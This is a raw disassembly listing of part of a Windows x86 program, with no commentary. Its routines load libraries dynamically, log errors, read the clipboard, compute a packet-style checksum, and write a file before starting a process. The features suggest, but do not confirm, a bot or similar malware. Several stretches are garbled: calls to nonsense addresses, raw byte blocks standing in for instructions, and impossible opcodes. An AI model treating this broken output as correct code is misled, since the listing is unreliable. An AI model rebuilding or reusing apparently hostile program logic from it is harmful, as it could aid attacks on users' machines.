cmp ds:dword_430830, ebx
jz short loc_40687D
cmp ds:dword_4307F8, ebx
jz short loc_40687D
cmp eax, ebx
jnz short loc_406887
jmp short loc_40687D
; ---------------------------------------------------------------------------
loc_406872: ; CODE XREF: sub_405D8E+A90�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_4308A4, eax
loc_40687D: ; CODE XREF: sub_405D8E+ACC�j
; sub_405D8E+AD4�j ...
mov ds:dword_4308A0, 1
loc_406887: ; CODE XREF: sub_405D8E+AE0�j
push offset dword_4206E4
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4068BC
push offset dword_4206D4
push edi
call esi
push offset dword_4206C4
push edi
mov ds:dword_430714, eax
call esi
cmp ds:dword_430714, ebx
mov ds:dword_430804, eax
jz short loc_4068C7
cmp eax, ebx
jnz short loc_4068D1
jmp short loc_4068C7
; ---------------------------------------------------------------------------
loc_4068BC: ; CODE XREF: sub_405D8E+B04�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_4308AC, eax
loc_4068C7: ; CODE XREF: sub_405D8E+B26�j
; sub_405D8E+B2C�j
mov ds:dword_4308A8, 1
loc_4068D1: ; CODE XREF: sub_405D8E+B2A�j
push offset dword_4206B8
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40695A
push offset dword_4206A4
push edi
call esi
push offset dword_420694
push edi
mov ds:dword_4307CC, eax
call esi
push offset dword_420684
push edi
mov ds:dword_430818, eax
call esi
push offset dword_420674
push edi
mov ds:dword_43075C, eax
call esi
push offset dword_420664
push edi
mov ds:dword_430724, eax
call esi
push offset dword_420654
push edi
mov ds:dword_4307B0, eax
call esi
cmp ds:dword_4307CC, ebx
mov ds:dword_43072C, eax
jz short loc_406965
cmp ds:dword_430818, ebx
jz short loc_406965
cmp ds:dword_43075C, ebx
jz short loc_406965
cmp ds:dword_430724, ebx
jz short loc_406965
cmp ds:dword_4307B0, ebx
jz short loc_406965
cmp eax, ebx
jnz short loc_40696F
jmp short loc_406965
; ---------------------------------------------------------------------------
loc_40695A: ; CODE XREF: sub_405D8E+B4E�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_4308B4, eax
loc_406965: ; CODE XREF: sub_405D8E+BA4�j
; sub_405D8E+BAC�j ...
mov ds:dword_4308B0, 1
loc_40696F: ; CODE XREF: sub_405D8E+BC8�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_405D8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406977 proc near ; CODE XREF: seg000:0040DA50�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp ds:dword_430850, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_4069BF
push ds:dword_430854
lea eax, [ebp+var_200]
push offset dword_420FFC
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_4069BF: ; CODE XREF: sub_406977+1A�j
cmp ds:dword_430858, esi
jz short loc_4069F3
push ds:dword_43085C
lea eax, [ebp+var_200]
push offset dword_420FE4
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_4069F3: ; CODE XREF: sub_406977+4E�j
cmp ds:dword_430860, esi
jz short loc_406A27
push ds:dword_430864
lea eax, [ebp+var_200]
push offset dword_420FC8
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406A27: ; CODE XREF: sub_406977+82�j
cmp ds:dword_430868, esi
jz short loc_406A5B
push ds:dword_43086C
lea eax, [ebp+var_200]
push offset dword_420FB0
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406A5B: ; CODE XREF: sub_406977+B6�j
cmp ds:dword_430870, esi
jz short loc_406A8F
push ds:dword_430874
lea eax, [ebp+var_200]
push offset dword_420F98
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406A8F: ; CODE XREF: sub_406977+EA�j
cmp ds:dword_430878, esi
jz short loc_406AC3
push ds:dword_43087C
lea eax, [ebp+var_200]
push offset dword_420F7C
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406AC3: ; CODE XREF: sub_406977+11E�j
cmp ds:dword_430880, esi
jz short loc_406AF7
push ds:dword_430884
lea eax, [ebp+var_200]
push offset dword_420F64
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406AF7: ; CODE XREF: sub_406977+152�j
cmp ds:dword_430888, esi
jz short loc_406B2B
push ds:dword_43088C
lea eax, [ebp+var_200]
push offset dword_420F48
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406B2B: ; CODE XREF: sub_406977+186�j
cmp ds:dword_430890, esi
jz short loc_406B5F
push ds:dword_430894
lea eax, [ebp+var_200]
push offset dword_420F30
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406B5F: ; CODE XREF: sub_406977+1BA�j
cmp ds:dword_430898, esi
jz short loc_406B93
push ds:dword_43089C
lea eax, [ebp+var_200]
push offset dword_420F14
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406B93: ; CODE XREF: sub_406977+1EE�j
cmp ds:dword_4308A0, esi
jz short loc_406BC7
push ds:dword_4308A4
lea eax, [ebp+var_200]
push offset dword_420EFC
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406BC7: ; CODE XREF: sub_406977+222�j
cmp ds:dword_4308A8, esi
jz short loc_406BFB
push ds:dword_4308AC
lea eax, [ebp+var_200]
push offset dword_420EE0
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406BFB: ; CODE XREF: sub_406977+256�j
cmp ds:dword_4308B0, esi
jz short loc_406C2F
push ds:dword_4308B4
lea eax, [ebp+var_200]
push offset dword_420EC8
push eax
call sub_41050B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 20h
loc_406C2F: ; CODE XREF: sub_406977+28A�j
lea eax, [ebp+var_200]
push offset dword_420E94
push eax
call sub_41050B
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_406C5C
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40E367
add esp, 14h
loc_406C5C: ; CODE XREF: sub_406977+2CE�j
lea eax, [ebp+var_200]
push eax
call sub_407E0E
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_406977 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C6E proc near ; CODE XREF: seg000:00409D0E�p
; seg000:00409D3C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_406CF9
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_406CF9
cmp [ebp+arg_8], esi
jz short loc_406CF9
cmp byte ptr [eax], 0
jz short loc_406CF9
push ebx
push edi
call sub_41AC6E
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_406CF4
push [ebp+arg_4]
push edi
call sub_410AE0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_406CED
sub eax, edi
push eax
push edi
push ebx
call sub_411D00
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_410B60
push eax
push [ebp+arg_8]
push ebx
call sub_411ED0
push [ebp+arg_4]
call sub_410B60
add eax, esi
push eax
push ebx
call sub_411B80
push ebx
push edi
call sub_411B70
add esp, 30h
mov esi, edi
loc_406CED: ; CODE XREF: sub_406C6E+3C�j
push ebx
call sub_410C83
pop ecx
loc_406CF4: ; CODE XREF: sub_406C6E+2B�j
mov eax, esi
pop ebx
jmp short loc_406CFB
; ---------------------------------------------------------------------------
loc_406CF9: ; CODE XREF: sub_406C6E+C�j
; sub_406C6E+13�j ...
xor eax, eax
loc_406CFB: ; CODE XREF: sub_406C6E+89�j
pop edi
pop esi
pop ebp
retn
sub_406C6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CFF proc near ; CODE XREF: sub_409218+E9�p
var_7D0 = dword ptr -7D0h
var_7CC = byte ptr -7CCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h
lea eax, [ebp+var_7D0]
push 0
push eax
call sub_410590
mov esi, [ebp+arg_0]
push esi
call sub_410B60
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_406D35
or eax, 0FFFFFFFFh
jmp short loc_406DA8
; ---------------------------------------------------------------------------
loc_406D35: ; CODE XREF: sub_406CFF+2F�j
xor ecx, ecx
mov [ebp+var_7D0], esi
test eax, eax
jle short loc_406D57
loc_406D41: ; CODE XREF: sub_406CFF+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_406D4E
cmp dl, 0Dh
jnz short loc_406D52
loc_406D4E: ; CODE XREF: sub_406CFF+48�j
and byte ptr [ecx+esi], 0
loc_406D52: ; CODE XREF: sub_406CFF+4D�j
inc ecx
cmp ecx, eax
jl short loc_406D41
loc_406D57: ; CODE XREF: sub_406CFF+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_406D88
lea edi, [ebp+var_7CC]
loc_406D64: ; CODE XREF: sub_406CFF+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_406D83
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_406D83
cmp ebx, 1F4h
jge short loc_406D88
mov [edi], ecx
inc ebx
add edi, 4
loc_406D83: ; CODE XREF: sub_406CFF+69�j
; sub_406CFF+74�j
inc edx
cmp edx, eax
jl short loc_406D64
loc_406D88: ; CODE XREF: sub_406CFF+5D�j
; sub_406CFF+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_406DA6
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_4105F0
add esp, 0Ch
loc_406DA6: ; CODE XREF: sub_406CFF+8E�j
mov eax, ebx
loc_406DA8: ; CODE XREF: sub_406CFF+34�j
pop esi
pop ebx
leave
retn
sub_406CFF endp
; =============== S U B R O U T I N E =======================================
sub_406DAC proc near ; CODE XREF: sub_406E06+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_406DE5
push ebx
mov ebx, edi
loc_406DC9: ; CODE XREF: sub_406DAC+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_406DE8
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_406DC9
pop ebx
loc_406DE5: ; CODE XREF: sub_406DAC+18�j
pop edi
pop esi
retn
sub_406DAC endp
; =============== S U B R O U T I N E =======================================
sub_406DE8 proc near ; CODE XREF: sub_406DAC+25�p
; sub_406E06+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_412027
cmp al, 61h
pop ecx
jl short loc_406E03
cmp al, 7Ah
jg short loc_406E03
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_406E03: ; CODE XREF: sub_406DE8+E�j
; sub_406DE8+12�j
xor eax, eax
retn
sub_406DE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E06 proc near ; CODE XREF: sub_407EEE+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_410BE0
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_410B60
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_410B60
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_406DAC
add esp, 14h
dec esi
mov edi, esi
loc_406E44: ; CODE XREF: sub_406E06+B6�j
test esi, esi
jle short loc_406EC2
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_412027
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_412027
pop ecx
cmp eax, ebx
pop ecx
jz short loc_406EBA
loc_406E6A: ; CODE XREF: sub_406E06+B2�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_406DE8
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_406E8B
mov eax, ecx
loc_406E8B: ; CODE XREF: sub_406E06+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_406EBE
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_412027
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax
mov [ebp+var_8], edx
call sub_412027
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_406E6A
loc_406EBA: ; CODE XREF: sub_406E06+62�j
dec edi
dec esi
jmp short loc_406E44
; ---------------------------------------------------------------------------
loc_406EBE: ; CODE XREF: sub_406E06+8A�j
xor eax, eax
jmp short loc_406EC7
; ---------------------------------------------------------------------------
loc_406EC2: ; CODE XREF: sub_406E06+40�j
mov eax, [ebp+arg_0]
add eax, edi
loc_406EC7: ; CODE XREF: sub_406E06+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_406E06 endp
; ---------------------------------------------------------------------------
loc_406ECC: ; CODE XREF: seg000:0040C642�p
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_41C068 ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp-100h]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call near ptr 3D0000h
mov ebp, 0FF00858Dh
; ---------------------------------------------------------------------------
db 0FFh
dd 80088AFFh, 57F1FF9h, 7509F980h, 0F1EB4003h, 48002080h
dd 0FF008D8Dh, 0C13BFFFFh, 88A0C72h, 742EF980h, 21F980EBh
dd 858DE67Ch, 0FFFFFF00h, 0C0BE5056h, 0FF004308h, 18680875h
dd 68004210h, 200h, 9B3CE856h, 0C4830000h, 5EC68B18h
; ---------------------------------------------------------------------------
leave
retn
; =============== S U B R O U T I N E =======================================
sub_406F56 proc near ; CODE XREF: seg000:0040DA23�p
push esi
push 0
call ds:dword_430764
test eax, eax
jz short loc_406F8D
push 1
call ds:dword_430784
mov esi, eax
test esi, esi
jz short loc_406F8D
push edi
push esi
call ds:dword_41C0C0 ; GlobalLock
push esi
mov edi, eax
call ds:dword_41C0BC ; GlobalUnlock
call ds:dword_4307E4
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_406F8D: ; CODE XREF: sub_406F56+B�j
; sub_406F56+19�j
xor eax, eax
pop esi
retn
sub_406F56 endp
; =============== S U B R O U T I N E =======================================
sub_406F91 proc near ; CODE XREF: seg000:0040CF56�p
var_4 = dword ptr -4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset dword_42102C
push esi
push edi
call ds:dword_4307A0
mov ebp, eax
cmp ebp, esi
jz short loc_40700D
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call near ptr 3D0000h
sub [esi+56h], edx
mov edi, eax
push esi
push 0F001Fh
push edi
call near ptr 3D0000h
pop ecx
push [esp+18h+var_4]
mov ebx, eax
push ebx
call sub_41050B
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call ds:dword_4307EC
push esi
push 1
push 4C9h
push ebp
call ds:dword_4307EC
push ebx
call near ptr 3D0000h
db 67h
push edi
call ds:dword_41C070 ; CloseHandle
push 1
pop eax
pop ebx
jmp short loc_40700F
; ---------------------------------------------------------------------------
loc_40700D: ; CODE XREF: sub_406F91+16�j
xor eax, eax
loc_40700F: ; CODE XREF: sub_406F91+7A�j
pop edi
pop esi
pop ebp
retn
sub_406F91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407013 proc near ; CODE XREF: sub_4089FD+304�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset dword_421034
push esi
call ds:dword_43084C
test eax, eax
jz short loc_4070B2
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:dword_41C078
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4070B2
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call near ptr 12D0004h
out dx, eax
push ebx
mov ebx, ds:dword_41C070
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4070B2
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call near ptr 12F0004h
mov bh, 56h
call ebx ; CloseHandle
loc_4070B2: ; CODE XREF: sub_407013+2A�j
; sub_407013+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_407013 endp
; =============== S U B R O U T I N E =======================================
sub_4070B7 proc near ; CODE XREF: seg000:0040A335�p
push 1
push offset dword_421044
call sub_40F382
pop ecx
pop ecx
push 50005h
push 6
call ds:dword_4306EC
neg eax
sbb eax, eax
neg eax
retn
sub_4070B7 endp
; ---------------------------------------------------------------------------
loc_4070D9: ; CODE XREF: seg000:0040DC4F�p
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp ds:dword_423008, esi
push edi
jz short loc_4070FD
cmp ds:dword_430860, esi
jnz short loc_4070FD
push esi
call sub_40801D
pop ecx
loc_4070FD: ; CODE XREF: seg000:004070EC�j
; seg000:004070F4�j
call sub_410180
lea eax, [ebp-764h]
push eax
push 400h
call near ptr 3D0000h
xchg eax, esp
lea eax, [ebp-764h]
push eax
lea eax, [ebp-260h]
push offset dword_4210B4
push eax
call sub_41050B
add esp, 0Ch
lea eax, [ebp-260h]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_41C078 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_40725D
lea eax, [ebp-260h]
push eax
lea eax, [ebp-764h]
push offset dword_421070
push eax
call sub_41050B
add esp, 0Ch
lea eax, [ebp-4]
push esi
push eax
lea eax, [ebp-764h]
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp-764h]
push eax
push edi
call near ptr 3D0000h
jz short near ptr byte_4071E5
call ds:dword_41C070 ; CloseHandle
push 10h
lea eax, [ebp-14h]
push esi
push eax
call sub_410590
push 44h
lea eax, [ebp-58h]
pop edi
push edi
push esi
push eax
call sub_410590
add esp, 18h
mov [ebp-58h], edi
mov edi, 104h
lea eax, [ebp-15Ch]
push edi
push eax
push esi
mov dword ptr [ebp-4Ch], offset dword_42F3E8
mov dword ptr [ebp-2Ch], 1
mov [ebp-28h], si
call near ptr 3D0000h
dec esp
push eax
call near ptr 3D0000h
sbb eax, 0FEA4858Dh
; ---------------------------------------------------------------------------
byte_4071E5 db 2 dup(0FFh), 50h ; CODE XREF: seg000:0040718C�j
dd 0C07C15FFh, 0F8830041h, 8D1274FFh, 0FFFEA485h, 8068FFh
dd 0E8500000h, 0FFFC8DFCh, 0A4858D1Dh, 50FFFFFEh, 0FDA0858Dh
dd 8D50FFFFh, 0FFF89C85h, 105868FFh, 0E8500042h, 92E7h
dd 8D10C483h, 0FFFC9C85h, 8D5057FFh, 0FFF89C85h, 0C5E850FFh
dd 0D3FFFC8Dh, 50EC458Dh, 50A8458Dh, 8685656h, 6A000040h
dd 858D5601h, 0FFFFFC9Ch, 0E8565056h, 0FFFC8DA4h
db 0D3h
; ---------------------------------------------------------------------------
loc_40725D: ; CODE XREF: seg000:0040714B�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407261 proc near ; CODE XREF: sub_4089FD+11C�p
var_1860 = byte ptr -1860h
var_158 = byte ptr -158h
var_58 = byte ptr -58h
var_48 = dword ptr -48h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 1860h
call sub_410BE0
push esi
push edi
mov ecx, 5C1h
mov esi, offset dword_4210CC
lea edi, [ebp+var_1860]
lea eax, [ebp+var_158]
rep movsd
movsw
push offset dword_4210C0
push eax
movsb
call sub_41050B
pop ecx
xor esi, esi
pop ecx
lea eax, [ebp+var_158]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_41C078 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe short near ptr loc_40731A+1
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_1860]
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_1860]
push eax
push edi
call near ptr 0D60004h
push eax
push edi
call ds:dword_41C070 ; CloseHandle
push 44h
lea eax, [ebp+var_48]
pop edi
push edi
push esi
push eax
call sub_410590
add esp, 0Ch
lea ecx, [ebp+var_58]
mov [ebp+var_48], edi
mov [ebp+var_18], si
push 1
pop eax
push ecx
lea ecx, [ebp+var_48]
push ecx
push esi
push esi
push 28h
mov [ebp+var_1C], eax
push eax
push esi
lea eax, [ebp+var_158]
push esi
push eax
push esi
call near ptr 0D80004h
loc_40731A: ; CODE XREF: sub_407261+55�j
lock pop edi
pop esi
leave
retn
sub_407261 endp
; =============== S U B R O U T I N E =======================================
sub_40731F proc near ; CODE XREF: sub_4013E9+7�p
; sub_401B7C+7�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4307D0
cmp eax, 0FFFFFFFFh
jnz short locret_407347
push [esp+arg_0]
call ds:dword_430814
test eax, eax
jnz short loc_407340
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_407340: ; CODE XREF: sub_40731F+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_407347: ; CODE XREF: sub_40731F+D�j
retn
sub_40731F endp
; =============== S U B R O U T I N E =======================================
sub_407348 proc near ; CODE XREF: sub_4090B0+D6�p
mov ecx, ds:dword_4306CC
xor eax, eax
test ecx, ecx
jz short locret_407356
call ecx
locret_407356: ; CODE XREF: sub_407348+A�j
retn
sub_407348 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407357 proc near ; CODE XREF: seg000:loc_40D9D5�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call ds:dword_43080C
mov ecx, eax
sub ecx, edi
jz loc_40741D
sub ecx, 32h
jz loc_407416
sub ecx, 48h
jz short loc_4073B7
sub ecx, 6Eh
jz short loc_4073B0
loc_407399: ; CODE XREF: sub_407357+8B�j
push eax
lea eax, [ebp+var_88]
push offset dword_422894
push eax
call sub_41050B
add esp, 0Ch
jmp short loc_4073F7
; ---------------------------------------------------------------------------
loc_4073B0: ; CODE XREF: sub_407357+40�j
push offset dword_42285C
jmp short loc_4073E9
; ---------------------------------------------------------------------------
loc_4073B7: ; CODE XREF: sub_407357+3B�j
push [ebp+var_8]
call sub_410C0F
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_410590
add esp, 10h
cmp esi, edi
jz short loc_4073E4
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call ds:dword_43080C
cmp eax, edi
jz short loc_40741D
jmp short loc_407399
; ---------------------------------------------------------------------------
loc_4073E4: ; CODE XREF: sub_407357+79�j
push offset dword_422818
loc_4073E9: ; CODE XREF: sub_407357+5E�j
; sub_407357+C4�j
lea eax, [ebp+var_88]
push eax
call sub_41050B
pop ecx
pop ecx
loc_4073F7: ; CODE XREF: sub_407357+57�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_407E0E
pop ecx
loc_407407: ; CODE XREF: sub_407357+C8�j
; sub_407357+DC�j
push esi
call sub_410C83
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407416: ; CODE XREF: sub_407357+32�j
push offset dword_4227D4
jmp short loc_4073E9
; ---------------------------------------------------------------------------
loc_40741D: ; CODE XREF: sub_407357+29�j
; sub_407357+89�j
cmp [esi], edi
jbe short loc_407407
lea ebx, [esi+4]
loc_407424: ; CODE XREF: sub_407357+DA�j
push ebx
call ds:dword_430808
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_407424
jmp short loc_407407
sub_407357 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407435 proc near ; CODE XREF: seg000:00401E3E�p
; seg000:00402BDB�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_410590
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call ds:dword_43073C
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_430AC4
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset dword_420328
push esi
call sub_41050B
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_407435 endp
; =============== S U B R O U T I N E =======================================
sub_40748E proc near ; CODE XREF: seg000:00401A92�p
; seg000:00401AD8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_4074B7
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_4074AA: ; CODE XREF: sub_40748E+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_4074AA
pop edi
jmp short loc_4074BB
; ---------------------------------------------------------------------------
loc_4074B7: ; CODE XREF: sub_40748E+A�j
mov edx, [esp+4+arg_0]
loc_4074BB: ; CODE XREF: sub_40748E+27�j
test esi, esi
pop esi
jz short loc_4074C5
movzx ecx, byte ptr [edx]
add eax, ecx
loc_4074C5: ; CODE XREF: sub_40748E+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40748E endp
; ---------------------------------------------------------------------------
loc_4074DB: ; DATA XREF: seg000:0040B824�o
push ebp
mov ebp, esp
mov eax, 10320h
call sub_410BE0
mov eax, [ebp+8]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp-144h]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call ds:dword_430728
mov [ebp+8], eax
lea eax, [ebp-0C0h]
push eax
call ds:dword_4307D0
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_407536
lea eax, [ebp-0C0h]
push eax
call ds:dword_430814
cmp eax, ebx
jz short loc_40753C
loc_407536: ; CODE XREF: seg000:00407523�j
cmp dword ptr [ebp+8], 0FFFFFFFFh
jnz short near ptr loc_407598+1
loc_40753C: ; CODE XREF: seg000:00407534�j
lea eax, [ebp-0C0h]
push eax
lea eax, [ebp-344h]
push offset dword_422918
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-28h], ebx
jnz short loc_40757C
push ebx
lea eax, [ebp-344h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-140h]
push eax
push dword ptr [ebp-144h]
call sub_40E367
add esp, 14h
